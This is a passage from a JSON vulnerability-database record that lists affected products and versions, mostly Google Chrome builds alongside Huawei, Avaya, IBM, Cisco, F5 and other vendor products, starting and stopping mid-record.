"13.0.753.0" }, { "model": "chrome beta", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.59" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.53" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.92" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.61" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1038.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.288.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.7" }, { "model": "nvs v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.496.0" }, { "model": "manageone v100r001c02", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.294.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.109" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.728.0" }, { "model": "solaris", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.65" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.85" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1036.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.706.0" }, { "model": "chrome beta", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "3.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.824.0" }, { "model": "2054-e07", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.28" }, { "model": "big-ip afm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.453.0" }, { "model": "unstructured data identification and mgmt", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.35" }, { "model": "ipso r71.30", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "6.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.585.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.68" }, { "model": "infosphere guardium", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "e6000 blade server bh640 v100r001c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.557.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.91" }, { "model": "smart zero core", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.80" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.15" }, { "model": "message networking sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.85" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.549.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.88" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.466.5" }, { "model": "thinpro", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.0" }, { "model": "solaris", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.111" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.314.1" }, { "model": "boot attestation service", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "3.0" }, { "model": "vcloud director appliance", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.0" }, { "model": "global threat intelligence proxy", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "2.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.207" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.440.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.343.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1053.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.957.0" }, { "model": "nexus", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "60000" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.52" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.573.0" }, { "model": "high-density server dh320 v100r001c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1055" }, { "model": "espace dcm v100r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.22" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.54" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.806.0" }, { "model": "enterprise linux server eus 6.4.z", "scope": null, "trust": 0.3, "vendor": "redhat", "version": null }, { "model": "oceanstor v100r001c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "18800" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.67" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.356.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.863.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.652.0" }, { "model": "oceanstor s2600t v100r005c02", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.29" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.52" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.86" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.5" }, { "model": "exalytics", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "0" }, { "model": "oneview", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.01" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.87" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.18" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.719.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.952.0" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8.2" }, { "model": "secureplatform r75.45", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "2.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.401.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.495.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1019" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.872.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.57" }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "communication server 1000m", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1022.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.153" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.341.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.11" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0" }, { "model": "websphere transformation extender", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.223" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1657.0" }, { "model": "espace ums v200r002", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.54" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.56" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.78" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1273.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.66" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "1.0.154.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.75" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.77" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1274.0" }, { "model": "communication server 1000m signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.954.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1056.0" }, { "model": "oceanstor s6800e v100r005c02", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1303.0" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.3.8.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1015" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.714.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.8" }, { "model": "server automation", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.13" }, { "model": "communication server 1000e", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.418.6" }, { "model": "system storage storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.22" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.19" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.150" }, { "model": "secureplatform r70.1", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "2.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.230" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.67" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.30" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.942.0" }, { "model": "gaia embedded r70", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.4" }, { "model": "aura application server sip core pb19", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53002.0" }, { "model": "big-ip pem", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "oceanstor s5600t v100r005c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.50" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.49" }, { "model": "prime ip express", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.342.7" }, { "model": "esx", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "4.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.60" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375125" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.100" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.128" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.720.0" }, { "model": "healthanalyzer", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.114" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.904.0" }, { "model": "gaia r77", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.222.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.212" }, { "model": "enterprise linux server aus", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6.4" }, { "model": "oceanstor s5900 v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.94" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.100" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.56" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.500.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.116" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.55" }, { "model": "strm/jsa", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2013.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.95" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.22" }, { "model": "autobackup server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.54" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.85" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.69" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1659.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1052.0" }, { "model": "videoscape conductor", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "communication server 1000m", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.305.0" }, { "model": "high-density server xh310 v100r001c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.89" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1034" }, { "model": "web gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.2.0.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.145" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.646.0" }, { "model": "websphere transformation extender", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.911.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.697.0" }, { "model": "asa cx and cisco prime security manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.222" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.593.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.49" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.0" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.667.2" }, { "model": "message networking", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.2" }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.86" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.41" }, { "model": "asset manager sensor", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.7" }, { "model": "quantum virtualized packet core", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "communication server 1000m signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.120" }, { "model": "network data loss prevention", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "9.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.79" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.100" }, { "model": "hosted collaboration mediation fulfillment", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.928.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.20" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.339.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1060.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.70" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.626.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.307.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1031.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.80" }, { "model": "standalone rack server cimc", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.708.0" }, { "model": "information archive", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.559.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.56" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.625.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.64" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "e9000 blade server ch240 v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "oceanstor 9000e v100r001c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1009.0" }, { "model": "oceanstor css v100r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35006.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.223.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.32" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.326" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1062.1" }, { "model": "hyperdp oceanstor n8500 v200r001c09", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.18" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.203" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.881.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.800.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.680.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.659.0" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.37599" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.330.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.84" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.2" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.26" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.93" }, { "model": "power hmc r7.6.0", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7" }, { "model": "rack server rh1288 v100r002c0", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.53" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.58" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1001" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.18" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "11000" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-iq cloud", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.70" }, { "model": "tam data manager", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "0" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.10.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1056" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.33" }, { "model": "linux lts", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "14.04" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.96" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.768.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.82" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.40" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.871.0" }, { "model": "gaia embedded r76", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "9710-e01", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": 